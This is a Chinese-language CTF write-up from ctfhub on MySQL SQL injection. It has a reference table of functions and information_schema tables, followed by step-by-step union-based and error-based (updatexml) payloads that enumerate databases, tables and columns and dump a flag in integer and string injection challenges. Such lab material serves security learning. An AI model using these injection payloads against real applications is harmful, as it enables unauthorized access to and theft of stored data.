常见sql注入解题思路(题目来源ctfhub)
关键字/语句/函数 | 解释 |
---|---|
union select | 联合查询,联合注入常用 |
database() | 回显当前连接的数据库 |
version() | 查看当前sql的版本如:mysql 1.2.3,mariadb-4.5.6 |
group_concat() | 把产生的同一分组中的值用,连接,形成一个字符串 |
information_schema | 存了很多mysql信息的数据库 |
information_schema.schemata | information_schema库的一个表,名为schemata |
schema_name | schemata表中存储mysql所有数据库名字的字段 |
information_schema.tables | 存了mysql所有的表 |
table_schema | tables表中存每个表对应的数据库名的字段 |
table_name | 表的名字和table_schema一一对应 |
information_schema.columns | columns表存了所有的列的信息4 |
column_name | 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名) |
table_name | 表的名字和column_name一一对应 |
select updatexml(1,concat(0x7e,database(),0x7e),1); | 这里注意,只在databse()处改你想要的内容即可报错回显 |
right(str, num) | 字符串从右开始截取num个字符 |
left(str,num) | 同理:字符串从左开始截取num个字符 |
substr(str,N,M) | 字符串,从第N个字符开始,截取M个字符 |
1整数型注入
首先,爆库名
4 union select 3,database()
接着,爆所有数据库名
4 union select 3,group_concat(schema_name) from information_schema.schemata
然后,爆表名
4 union select 3,group_concat(table_name) from information_schema.tables where table_schema=“sqli”
随后,爆字段
4 union select 3,group_concat(column_name) from information_schema.columns where table_name=“flag”
最后,查看内容
4 union select 3,group_concat(flag) from sqli.flag
2字符型注入
字符型注入参数需要单引号来闭合,整数型不需要。这里如果接着想在后面输入语句的话,就要手动给参数加上单引号,然后将他加上的单引号注释掉。
爆库名
123’ union select database(),2 #
爆表名
123’ union select group_concat(table_name),3 from information_schema.tables where table_schema=‘sqli’ #
爆列名
123’ union select group_concat(column_name) ,3 from information_schema.columns where table_name=‘flag’ #
得到flag
123’ union select flag,3 from sqli.flag #
总结:由上一道sql注入的经验得知首先需要手动遍历一遍数据库,得知数据库到底有几列,然后再开始爆库,表,字段。